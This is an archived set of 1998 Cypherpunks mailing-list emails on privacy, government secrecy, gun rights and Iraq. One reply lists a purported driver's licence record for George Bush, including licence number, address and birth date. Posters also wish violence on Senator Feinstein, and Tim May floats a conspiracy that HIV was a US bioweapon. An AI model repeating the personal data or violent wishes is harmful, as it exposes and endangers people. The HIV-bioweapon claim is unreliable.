Received: from uclink4.berkeley.edu (uclink4.Berkeley.EDU [128.32.25.39]) by toad.com (8.7.5/8.7.3) with ESMTP id KAA09069 for <cypherpunks@toad.com>; Sat, 21 Feb 1998 10:59:13 -0800 (PST)
Received: from elfolon.lonko.com (dialup46-berkeley.autobahn.org [206.79.223.146])
	by uclink4.berkeley.edu (8.8.8/8.8.8) with SMTP id KAA19501
	for <cypherpunks@toad.com>; Sat, 21 Feb 1998 10:59:08 -0800 (PST)
Message-Id: <199802211859.KAA19501@uclink4.berkeley.edu>
X-Sender: jkunken@uclink4.berkeley.edu
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.0
Date: Sat, 21 Feb 1998 10:59:38 -0800
To: cypherpunks@toad.com
From: Joshua Kunken <jkunken@uclink4.berkeley.edu>
Subject: Re: Request for Web Browser Information
Mime-Version: 1.0
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text/plain; charset="us-ascii"
Content-Length: 692


Sure, check out:  http://www.autobahn.org/main/addr.shtml

What year is it? 1984? hehhehe

Lates...

At 05:51 AM 2/21/98 -0800, you wrote:
>I would like to know the information my browser makes available to web
sites. I use both Netscape and Internet Explorer.
>
>Obviously web sites can determine my IP address for any given session;
they can also look at cookies left by themselves and other sites.
>
>Can anyone point me to where I can learn exactly what other information is
made available (browser version?, OS version?, system name?, user name?,
etc.)?
>
>Thanks in advance.
>
>David
> 

Joshua Kunken
Administrative Computing
jkunken@uclink4.berkeley.edu

"100% uptime? You betcha!"


From owner-cypherpunks@Algebra.COM Sun Feb 22 03:14 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA20085 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 03:14:29 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id OAA25674
	for cypherpunks-outgoing; Sat, 21 Feb 1998 14:07:08 -0500 (EST)
Received: from always.got.net (root@gotnet.znet.net [207.167.86.126])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id OAA25660
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 14:07:03 -0500 (EST)
Received: from [207.167.93.63] (tcmay.got.net [207.167.93.63])
	by always.got.net (8.8.8/8.8.7/Debian/GNU) with ESMTP id LAA28187
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 11:09:18 -0800
 <89B3250098@ou20.csm.port.ac.uk>
X-Sender: tcmay@mail.got.net
Message-Id: <v03102809b114cc950c7f@[207.167.93.63]>
In-Reply-To: <3.0.5.32.19980220092346.008dd590@popd.ix.netcom.com>
References: <199802201043.FAA00924@users.invweb.net>
 <89B3250098@ou20.csm.port.ac.uk>
Mime-Version: 1.0
Date: Sat, 21 Feb 1998 11:12:12 -0800
To: cypherpunks@Algebra.COM
From: Tim May <tcmay@got.net>
Subject: The Secret Side of Government
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text/plain; charset="us-ascii"
Content-Length: 6679


At 9:23 AM -0800 2/20/98, Bill Stewart wrote:

>They'd also be focusing on the great job they've done eliminating the
>entire US stock of CBW and nukes.  Oh, we haven't?  Well their weapons
>of mass destruction are Evil, and ours are Freedom Fighting Tools.
>Actually the US and Former Soviet Union have substantially reduced the
>nuclear forces, especially older missiles that are hard to maintain,
>but the US refused for a long time to sign the CBW treaties,
>and I'm not sure they ever did follow through and destroy their supplies.

Nixon made a very big deal of signing some papers which would supposedly
get rid of CBW supplies and research. This was back in 1972.

(I remember this clearly, because I was in college and my roomates and I,
all libertarians, hooted when the supposedly eliminated CBW weapons got
loose at Dugway Proving Grounds and killed a bunch of sheeple (er, "sheep")
in Utah...and an excellent and rage-inspiring movie with George C. Scott,
"Rage," had a similar theme. Highly recommended, if you can find it.)

What really happened is that a bunch of military bacteriological warfare
facilities were turned over to the private sector. Oh, and renamed "cancer
research," which looked good to the sheeple, as Nixon had just declared a
War on Cancer.

So, Litton Bionetics took a big piece, the National Cancer Institute
formally took over some of the military's labs (but the staff remained
unchanged, and some of the military brass "retired" to these
now-civilianized facilities), and things went on as usual. Well, not "as
usual," as it appears the secret side of governtment drastically stepped-up
work on biological and chemical weapons.

And the stockpiles still exist, of course. Some are corroding inside VX
warheads near Hanford, Washington (a good place to be far away from). Some
are stockpiled in Germany, apparently too dangerous to even move. And some
are no doubt stockpiled in lots of other places.

Here's a little personal story:

I worked for two summers in one of the labs probably related to this whole
thing. I worked in an immunology lab in the summers of 1969 and 1970,
working on immunoassay methods. My job was mundane, to run experiments
directed by others, to bleed mice for their serum, to run centrifuges, and
so on. Others in the lab worked with monkeys, on cancer, and hepatitus.
Yep, we had one of the first clean rooms in the nation, with double
airlocks, devoted to Hepatitus B (I think it was). All of this in a
nondescript warehouse building in Springfield, Virginia, just down Highway
95 from Washington. The company was initially Melpar, then the lab was spun
off into Melloy Labs. Some of the labs, Melpar at least, were sold to
E-Systems, the spook/SIGINT private contractor.

(For those who live, or lived, in the D.C. area, here are a few more
details. The lab was originally at the Arlington Boulevard facility of
Melpar, near the intersection with the Beltway. The biological labs were
spun-off and moved to West Springfield in 1970.)

I hadn't thought about this work for many years, until in the past couple
of years I've been reading up on the history of AIDS and the military's
work on monkey viruses. (Books, "Hot Zone," "AIDS, Ebola, and Emerging
Viruses," "Mary, Ferry, and the Monkey Virus," etc.)

It turns out that the period 1969-73 was a period of "privatizing" much
research that the military had formerly done. Several labs affiliated with
defense contractors were actively working with monkey cultures, and
maintaining contacts with Fort Detrick, the NIH, and the NCI. One figure
that stands out in this time period is Dr. Robert Gallo, who later achieved
fame for his HIV discovery (prior credit is often given to the French head
of the Pasteur Institute, Dr. Luc M.). I honestly have no way of recalling
if Gallo was circulating through our lab, or if the doctors I worked for
(Dr. Anne Jackson and Dr. Frederick Hyams) had contact with him.

As I learn more about this period, and the links between Hepatitus-B, AIDS,
and the timing of the big AIDS/HIV outbreak in the late 70s and early 80s,
I can't help wondering if the lab I worked in was involved in this whole
affair. A lot of things match up closely, and the absorbtion of Melpar into
E-Systems is part of the coincidences.

But all of this was a long time ago, before many of you were born.

The larger issue is that the spook side of government is only the tip of
the iceberg. For every $600 million "unindentified" building out past
Dulles Airport, eventually identified as the new headquarters of the
supersecret National Reconnaissance Organization (NRO), there are many
times as many "contractors" and "subcontractors" doing work too sensitive
even for the government to do. In fact, the unknown huge building in the
Virginia countryside was officially labelled as a Rockwell building, if I
recall correctly.)

(Readers may be familiar with Wackenhut, Science Applications, MITRE, etc.
Besides the large aerospace companies, all with large spook divisions, and
all with outlying offices doing work that few in the parent companies are
even cleared to know about.)

This is precisely the military-industrial complex that Eisenhower warned us
about in his Farewell Speech, and that Washington in effect warned us about
in _his_ speech, when he warned about foreign entanglements and foreign
wars.

Footnote: Did the U.S. government and its subcontractors develop HIV as a
biological weapon? To be tested in Africa, as some suggest? Or was it an
accident, an accident let out of the labs of the Naval Health Sciences labs
(later Litton Bionetics) the East Bay of the Bay Area (site of many early
AIDS cases)? Or is it true that HIV viruses have been found in biological
specimens preserved for 40 years? And even if some HIV-like viruses existed
in nature, could the U.S. have isolated it and concentrated it in those
labs doing the work I described in the early 70s?

I don't know the answer to these questions. As my favorite researcher into
these matters puts it, "Food for thought and grounds for further research."
(Dave Emory, whose tapes can be bought. Use web search engines to find URLs
if interested.)

One thing I know for sure, the "secret" side of government is far larger
than most people think.

--Tim May

Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.




From owner-cypherpunks@Algebra.COM Sun Feb 22 00:11 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA19747 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 00:11:31 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id LAA23403
	for cypherpunks-outgoing; Sat, 21 Feb 1998 11:04:21 -0500 (EST)
Received: from galaxy.galstar.com (root@galaxy.galstar.com [204.251.80.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id LAA23390
	for <cypherpunks@ALGEBRA.COM>; Sat, 21 Feb 1998 11:04:15 -0500 (EST)
Received: from basement.replay.com (basement.replay.com [194.109.9.44])
	by galaxy.galstar.com (8.8.5/8.8.5) with ESMTP id FAA05882
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 05:12:43 -0600 (CST)
Received: (from replay@localhost)
	by basement.replay.com (8.8.5/RePlay, Inc.) id LAA12091;
	Sat, 21 Feb 1998 11:55:13 +0100 (MET)
Date: Sat, 21 Feb 1998 11:55:13 +0100 (MET)
Message-Id: <199802211055.LAA12091@basement.replay.com>
From: Anonymous <nobody@REPLAY.COM>
Comments: This message did not originate from the Sender address above.
	It was remailed automatically by anonymizing remailer software.
	Please report problems or inappropriate use to the
	remailer administrator at <abuse@REPLAY.COM>.
Subject: Last Chance ...less than 149 copies left! Plus FREE Bonus.
To: "J. Adam Hewison" <jadam@ino.com>, cypherpunks@Algebra.COM
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text
Content-Length: 458


You spammed to the Cypherpunks list:

>Dear Fred,
>
>The folks who produce The 1998 ULTIMATE FUTURES TRADING GUIDE,  just
>informed me that they have less than 149 copies available for sale
>
>Check it out at: http://www.marketdepot.com/products/utg/
>
>See what the GUIDE has to say about El Nino ... and what effect it will
>have on the economy and the markets and ultimately your money.

Go fuck yourself, preferably up the ass with a large metal hook.


From owner-cypherpunks@Algebra.COM Sun Feb 22 05:58 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA20385 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 05:58:49 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id QAA26879
	for cypherpunks-outgoing; Sat, 21 Feb 1998 16:48:05 -0500 (EST)
Received: from einstein.ssz.com (root@einstein.ssz.com [204.96.2.99])
	by www.video-collage.com (8.8.5/8.8.5) with SMTP id QAA26867
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 16:48:00 -0500 (EST)
Received: (from cpunks@localhost) by einstein.ssz.com (8.6.12/8.6.9) id QAA31095 for cypherpunks@algebra.com; Sat, 21 Feb 1998 16:02:28 -0600
Received: (from bin@localhost) by einstein.ssz.com (8.6.12/8.6.9) id QAA31090 for cypherpunks-outgoing; Sat, 21 Feb 1998 16:02:24 -0600
Received: from mvs2.teravision (mvs2.teralogic-inc.com [206.184.231.200]) by einstein.ssz.com (8.6.12/8.6.9) with ESMTP id QAA31084 for <cypherpunks@ssz.com>; Sat, 21 Feb 1998 16:02:21 -0600
Received: by MVS2 with Internet Mail Service (5.0.1457.3)
	id <WYWBMK54>; Sat, 21 Feb 1998 13:43:34 -0800
Message-ID: <413AC08141DBD011A58000A0C924A6D50D7DA6@MVS2>
From: Ernest Hua <Hua@teralogic-inc.com>
To: cypherpunks@ssz.com
Cc: Ernest Hua <Hua@teralogic-inc.com>
Subject: RE: Pensacola Police have lost their mind!! (fwd)
Date: Sat, 21 Feb 1998 13:43:33 -0800
X-Priority: 3
X-Mailer: Internet Mail Service (5.0.1457.3)
X-Mailing-List: cypherpunks@ssz.com
X-List-Admin: list@ssz.com
X-Loop: ssz.com
X-Language: English, Russian, German
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text
Content-Length: 2923


Those of you who are parents of toddlers and have watched in horror as
other parents seem to have zero control over their children, would
understand why the school reacted this way.  Getting the police involved
may not necessarily be the "right" thing to do, but there is a LOT of
pressure on public schools to be passive or suffer the wrath of
child-abuse lawsuits.

There are many times when they respond with "we don't do things that way
..." when they should just send the kid home.  There is no middle ground
where both the school and the parents are happy, unless the parents
really care and participate.  Getting the police involved was probably
just a way for the teachers and/or the administrators to pass the buck
to someone else because they feel powerless to deal with the situation.

(Isn't this a bit off topic?  But for the police part?)

Ern

	-----Original Message-----
	From:	Jim Choate [SMTP:ravage@ssz.com]
	Sent:	Friday, February 20, 1998 7:09 PM
	To:	cypherpunks@ssz.com
	Subject:	Pensacola Police have lost their mind!! (fwd)


	Forwarded message:

	> From: "William H. Geiger III" <whgiii@invweb.net>
	> Date: Fri, 20 Feb 98 20:27:22 -0500
	> Subject: Pensacola Police have lost their mind!!

	> I don't know if this story has reached the AP wire or not but
today the
	> brave defenders of the faith here in Pensacola, FL have done
their sworn
	> duty to protect us all by arresting a 5yr old on assault
charges (againts
	> one of the Adult staff of the school).

	It made it to CNN.

	> These are the same brave soles who a few months ago when
confronted by a
	> man sitting in his car with a gun to his head solved this
problem by
	> riddeling his car, surrounding buildings, and a McDonalds
playground with
	> over 100 rounds.
	> 
	> As soon as I have some more information on this I will post a
full report.

	Their story was that the child had a behavioral problem and the
parents
	refused to get counceling when the school requested. She
apparently goes on
	room smashing temper tantrums on a regular basis. The father of
the child
	said it was the most ludicrous thing he had ever heard of,
reportedly.

	Can't say that changes the situation a heck of a lot though...



____________________________________________________________________
	   |
|
	   |            When a man assumes a public trust, he should
|
	   |            consider himself public property.
|
	   |
|
	   |                                      Thomas Jefferson
|
	   |
|
	   |
| 
	   |            _____                             The Armadillo
Group   |
	   |         ,::////;::-.                           Austin, Tx.
USA     |
	   |        /:'///// ``::>/|/
http://www.ssz.com/   |
	   |      .',  ||||    `/( e\
|
	   |  -====~~mm-'`-```-mm --'-                         Jim
Choate       |
	   |
ravage@ssz.com     |
	   |
512-451-7087      |

|____________________________________________________________________|


From owner-cypherpunks@Algebra.COM Sun Feb 22 04:04 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA20185 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 04:04:08 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id OAA25980
	for cypherpunks-outgoing; Sat, 21 Feb 1998 14:57:00 -0500 (EST)
Received: from sirius.infonex.com (sirius.infonex.com [209.75.197.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id OAA25968
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 14:56:56 -0500 (EST)
Received: (from cpunks@localhost) by sirius.infonex.com (8.8.8/8.7.3) id LAA23589; Sat, 21 Feb 1998 11:59:07 -0800 (PST)
Received: from rigel.cyberpass.net (root@rigel.infonex.com [209.75.197.3]) by sirius.infonex.com (8.8.8/8.7.3) with ESMTP id LAA23584 for <cpunks@sirius.infonex.com>; Sat, 21 Feb 1998 11:58:59 -0800 (PST)
Received: from pm02sm.pmm.mci.net (pm02sm.pmm.mci.net [208.159.126.151]) by rigel.cyberpass.net (8.8.8/8.7.3) with ESMTP id LAA14136 for <cypherpunks@cyberpass.net>; Sat, 21 Feb 1998 11:53:41 -0800 (PST)
Received: from ampugh.mcit.com (atnmax2-233.mcit.com)
 by PM02SM.PMM.MCI.NET (PMDF V5.1-10 #27034)
 with SMTP id <0EOQ0026SVHC2Q@PM02SM.PMM.MCI.NET> for
 cypherpunks@cyberpass.net; Sat, 21 Feb 1998 19:58:26 +0000 (GMT)
From: amp@pobox.com
Date: Sat, 21 Feb 1998 13:45:56 -0500
Subject: Re: SF Chronicle on Sen. Dianne Feinstein: "Feinstein Offline"
To: cypherpunks@cyberpass.net, Tim May <tcmay@got.net>
Message-id: <Chameleon.888087491.amp@ampugh.mcit.com>
MIME-version: 1.0
X-Mailer: Z-Mail Pro 6.1 (Win32 - 021297), NetManage Inc.
References: <v03102809b11253ad78b7@[207.167.93.63]>
X-Priority: 3 (Normal)
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: TEXT/PLAIN; CHARSET=ISO-8859-1
Content-Length: 3377





> > Tim May <tcmay@got.net> said...

=snip=
 
> > In Feinstein's view, ``This whole information thing is moving so
> > fast that one has to be sure that kids are protected,'' she said.
> > ``I'm concerned when kids blow themselves up by building bombs (they
> > learned to make) by reading things in the encyclopedia. There is a
> > philosophy that anything goes. This is why I support the repeal of
> > the First Amendment and prison terms for thought criminals."

 
> She's a buffoon who is probably the first one who'll be sent to the wall
> if there's ever a Second American Revolution.

> As for her concern about Social Security numbers being posted online, did
> it ever occur to her and her ilk that perhaps the problem is the
> widespread use of SS numbers by increasing numbers of government
> agencies, by requirements that banks use them, by requirements that motor
> vehicle departments use them, and so on?

> "Duh."
 
> The solution is not a new set of laws to felonize information like this,
> but the elimination of the SS number as a universal identifier. Far too
> late for that, of course, but Fineswine's laws won't help anybody. In
> fact, law enforcement will continue its abuse of SS numbers, its role in
> falsifying records and official documents, and so on.

Along similar lines, the state of texas recently (last year) made it 
illegal to post information such as drivers license numbers and whatnot on 
the net. The company that was doing so promptly moved its web server from 
dallas to antigua. Gee, seems like they had an effective law eh?

The problem is, the company was getting the information from the state in 
the first place. Anyone with a bit of cash can buy the entire drivers 
license database from the state of texas on CD-rom. Rather than 
criminalizing private actions, it would have been much better for the state 
to just =stop selling the information=! The databases already held would 
quickly become stale, and the problem would pretty much go away.

The state sees such things as revenue streams they are intitled to. Even 
though citizen-units cannot opt out of the database, they will sell it to 
anyone who has the $$$ they are asking for it. 

This is a great example of exactly how much respect a government agency has 
for your privacy.


For instance, here is the information contained on George Bush's drivers 
license...

Name: BUSH,GEORGE HERBERT
License number: 000173204
Address:  9 S West Oak Dr
Date of birth: 6/12/24
City/Zip code:> HOUSTON 77056-2121
Gender: MaleRace: White
Height: 6.01
Weight: 190 pounds
Eye color: Gray
Hair: Brown
Last transaction date: 3/30/93
Last transaction: Renewal



> Let's try to be sure DiFi is in D.C. when Abu Nidal makes his move.


Let's hope it takes place during a state of the union speech.


---------------End of Original Message-----------------

------------------------
Name: amp
E-mail: amp@pobox.com
Date: 02/21/98
Time: 13:45:57
Visit me at http://www.pobox.com/~amp
==
     -export-a-crypto-system-sig -RSA-3-lines-PERL
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)
==

'Drug Trafficking Offense' is the root passphrase to the Constitution.

Have you seen 
http://www.public-action.com/SkyWriter/WacoMuseum
------------------------


From owner-cypherpunks@Algebra.COM Sun Feb 22 05:57 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA20377 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 05:57:09 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id QAA26907
	for cypherpunks-outgoing; Sat, 21 Feb 1998 16:49:25 -0500 (EST)
Received: from always.got.net (root@gotnet.znet.net [207.167.86.126])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id QAA26895
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 16:49:21 -0500 (EST)
Received: from [207.167.93.63] (tcmay.got.net [207.167.93.63])
	by always.got.net (8.8.8/8.8.7/Debian/GNU) with ESMTP id NAA03920
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 13:51:36 -0800
X-Sender: tcmay@mail.got.net
Message-Id: <v0310280ab114fcfb6b66@[207.167.93.63]>
Mime-Version: 1.0
Date: Sat, 21 Feb 1998 13:54:33 -0800
To: cypherpunks@Algebra.COM
From: Tim May <tcmay@got.net>
Subject: Re: speaking of tax dollars at work...
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text/plain; charset="us-ascii"
Content-Length: 2551



We've been having some interesting discussions in scruz.general, my local
newsgroup. (We get together every few months for a "scruzfest," so a sense
of community amonst the discussants has been emerging. I probably now know
more folks by sight in scruz.general than I know Cypherpunks.)

I will forward a couple of my articles.


>X-From_: tcmay@got.net Fri Feb 20 19:22:21 1998
>X-Delivered: at request of tcmay on always
>Date: Fri, 20 Feb 1998 19:25:17 -0800
>From: tcmay@got.net (Tim May)
>To: tcmay@got.net
>Subject: Re: speaking of tax dollars at work...
>Newsgroups: scruz.general
>Organization: None
>
>In article <6clf84$buc@news.scruz.net>, glena@armory.com (Dirt Devil) wrote:
>
>
>>
>> I am actually on somewhat shakey ground in agreeing with Tim's desire
>> to hold to the BOR, simply because they have been so perferated.
>>
>
>Sure the Amendments have been perforated, but they're all we have left.
>Even now, as various laws try to close in on controlling speech, the First
>Amendment's crystal clear "Congress shall make no law..." language is all
>we have to hold back the tide.
>
>(And it is _still_ a battle, with Brandeis' "shouting "Fire!" in a crowded
>theater" being used to justify all manner of speech restrictions.)
>
>As for the Second, equally crystal clear, the record is even shabbier.
>>From outright bans on ownership of weapons in New York, to restrictions in
>California, to moves for confiscation of all guns, the tide is _barely_
>being held back.  (As Heather noted in her earlier message, all the
>folderol about the Second referring to a state-run militia, like the
>National Guard, is pure nonsense: the Founders were worried about the
>citizenry being able to fight back, and understood that only free men are
>allowed to possess weaponry.)
>
>In all cases where there is no crystal clear, solid, indisputable,
>"Congress shall make no law..."  language, the statist and professional
>bureaucrats, aided by foolish and short-sighted voters, whittle away the
>freedoms and rights of us all.
>
>The Bill of Rights ain't enough, but it's all we've got.
>
>And it's going fast.
>
>--Tim May
>
>--
>Just Say No to "Big Brother Inside"
>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May              | Crypto Anarchy: encryption, digital money,
>ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
>W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
>Higher Power: 2^3,021,377   | black markets, collapse of governments.
>



From owner-cypherpunks@Algebra.COM Sun Feb 22 05:59 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA20391 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 05:59:25 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id QAA26947
	for cypherpunks-outgoing; Sat, 21 Feb 1998 16:52:54 -0500 (EST)
Received: from always.got.net (root@gotnet.znet.net [207.167.86.126])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id QAA26935
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 16:52:50 -0500 (EST)
Received: from [207.167.93.63] (tcmay.got.net [207.167.93.63])
	by always.got.net (8.8.8/8.8.7/Debian/GNU) with ESMTP id NAA04081
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 13:54:56 -0800
X-Sender: tcmay@mail.got.net
Message-Id: <v0310280bb114fe28b1f9@[207.167.93.63]>
Mime-Version: 1.0
Date: Sat, 21 Feb 1998 13:57:36 -0800
To: cypherpunks@Algebra.COM
From: Tim May <tcmay@got.net>
Subject: Re: Anthrax--The Four Horsemen are Riding
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text/plain; charset="us-ascii"
Content-Length: 4263



Another article I wrote for scruz.general.


>X-From_: tcmay@got.net Sat Feb 21 12:54:42 1998
>X-Delivered: at request of tcmay on always
>Date: Sat, 21 Feb 1998 12:57:39 -0800
>From: tcmay@got.net (Tim May)
>To: tcmay@got.net
>Subject: Re: Anthrax--The Four Horsemen are Riding
>Newsgroups: scruz.general
>Organization: None
>
>In article <34ee3039.1340384@cnews.newsguy.com>, mmelpremo@cruzio.com
>(mmelpremo@cruzio.com) wrote:
>
>> On Thu, 19 Feb 1998 10:34:16 -0800, tcmay@got.net (Tim May) wrote:
>>
>> >Cruzans,
>> >
>> >Here's one of my articles to the Cypherpunks list, a list FBI Director
>> >Louis Freeh recently denounced as being a haven for information
>> >terrorists. If I get busted for having a lab which the Feds decide is
>> >thoughtcrime, I want someone in Santa Cruz to know what I think about
>> >these issues.
>> <snip>
>>
>> So, Tim, what do you think ought to be done, (if anything), about
>> Iraq?  Should we stop sanctions and let the Middle East worry about
>> him?  Should we continue sanctions?  Should we forget about UN
>> inspections?
>
>1. Nothing. Ain't my problem, ain't yours, ain't anyone else I know of's.
>
>2. Sanctions almost never work. Sanctions for 38 years on Cuba have had
>almost no effect on Castro except to consolidate his position. (Much as I
>may dislike Castro's policies, no American should be threatened with jail
>time for committing the "crime" of travelling to Cuba, or selling stuff
>they own to Cubans, or buying Cuban cigars, etc. In a free country, which
>neither the U.S. nor Cuba are, one does not criminalize actions which do
>not directly harm other persons.)
>
>3. Bombing Iraq will be unlikely to work this time any more than last
>time(s). I have no energy to recount the info being provided on CNN and
>elsewhere, but consider that the weapons inspectors themselves claimed
>that their work over the past half dozen years had more effect on getting
>rid of weapons than the bombing campaign in 1991 did. Assuming they're not
>lying, how, pray tell, does a lesser bombing than 1991 then solve the
>putative problem?
>
>4. As for the "putative problem," it is indeed putative. So Iraq has
>"weapons of mass destruction." So does Iran. So does Syria. So does
>Israel. And so on, for most of the countries in the world. (Let us not
>rant about how Iraq used WOMD on its own people, or on the Kurds. The Sovs
>used WOMD on the Afghanis...did we threaten to bomb them? How about the
>Chinese? And so on.
>
>5. I repeat, it ain't our problem. Washington (the President, not the
>pesthole) warned us to avoid foreign entanglements and foreign wars, and
>yet the U.S. squanders its money and its soldiers' lives in dozens of
>foreign wars.
>
>(There hasn't been a legitimate war since the Revolution, possibly since
>the War of 1812, in my view.)
>
>>
>> I find myself in the middle on this one.  On the one hand, I think
>> Saddam's a threat to neighboring countries (particularly Kuwait),
>> although I don't know how big a threat.  On the other hand, I agree
>> with you that America should not be Cop of the World.
>
>Countries invade other countries frequently. I didn't see us going to war
>with the Soviet Union over Afghanistan. I didn't see us going to war with
>Israel when it (several times) invaded and occupied the southern part of
>Lebanon.
>
>Ah, but the U.S. likes wars with _little_ countries. Panama, which we
>invaded because our CIA-installed leader was taking too large a share of
>the drug trade. Grenada, because it distracted attention from the 240
>Americans killed a few days before in Lebanon. Nicaragua, because we
>didn't like the leader the people had elected. Somalia, for reasons no one
>seems to be able to articulate. Bosnia, because the Europeans, in whose
>backyard the Balkan states are, decided not to bother.
>
>And so it goes.
>
>--Tim May
>
>--
>Just Say No to "Big Brother Inside"
>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May              | Crypto Anarchy: encryption, digital money,
>ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
>W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
>Higher Power: 2^3,021,377   | black markets, collapse of governments.
>



From owner-cypherpunks@Algebra.COM Sun Feb 22 05:59 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA20397 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 05:59:30 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id QAA26987
	for cypherpunks-outgoing; Sat, 21 Feb 1998 16:54:29 -0500 (EST)
Received: from always.got.net (root@gotnet.znet.net [207.167.86.126])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id QAA26975
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 16:54:25 -0500 (EST)
Received: from [207.167.93.63] (tcmay.got.net [207.167.93.63])
	by always.got.net (8.8.8/8.8.7/Debian/GNU) with ESMTP id NAA04175
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 13:56:40 -0800
X-Sender: tcmay@mail.got.net
Message-Id: <v0310280cb114fe8dc9cb@[207.167.93.63]>
Mime-Version: 1.0
Date: Sat, 21 Feb 1998 13:59:36 -0800
To: cypherpunks@Algebra.COM
From: Tim May <tcmay@got.net>
Subject: Keeping the Oil Price Up
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text/plain; charset="us-ascii"
Content-Length: 3210



The last, for now, of the articles.

--Tim


>X-From_: tcmay@got.net Sat Feb 21 13:11:09 1998
>X-Delivered: at request of tcmay on always
>Date: Sat, 21 Feb 1998 13:14:07 -0800
>From: tcmay@got.net (Tim May)
>To: tcmay@got.net
